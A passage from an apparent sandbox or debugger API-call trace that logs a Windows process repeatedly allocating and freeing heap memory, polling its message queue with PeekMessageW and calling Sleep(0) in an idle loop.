RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.528] Sleep (dwMilliseconds=0x0) [0259.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.528] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.528] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.528] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.528] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.529] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.529] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.529] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.529] Sleep (dwMilliseconds=0x0) [0259.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.529] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.529] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.529] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.530] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.530] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.530] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.530] Sleep (dwMilliseconds=0x0) [0259.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.530] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.530] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.530] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.531] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.531] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.531] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.531] Sleep (dwMilliseconds=0x0) [0259.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.531] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.531] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.531] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.532] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.532] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.532] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.532] Sleep (dwMilliseconds=0x0) [0259.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.532] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.532] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.533] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.533] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.533] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.533] Sleep (dwMilliseconds=0x0) [0259.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.533] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.534] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.534] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.534] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.534] Sleep (dwMilliseconds=0x0) [0259.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.534] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.535] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.535] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.535] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.535] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.535] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.535] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.535] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.535] Sleep (dwMilliseconds=0x0) [0259.535] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.535] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.535] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.535] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.535] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.535] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.536] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.536] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.536] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.536] Sleep (dwMilliseconds=0x0) [0259.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.536] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56a20 [0259.537] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56a20 | out: hHeap=0xbc0000) returned 1 [0259.537] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.537] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda1d0 [0259.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a98 [0259.537] Sleep (dwMilliseconds=0x0) [0259.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda1d0 | out: hHeap=0xbc0000) returned 1 [0259.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a98 | out: hHeap=0xbc0000) returned 1 [0259.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.537] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | out: hHeap=0xbc0000) returned 1 [0259.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32aa8 [0259.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32aa8 | 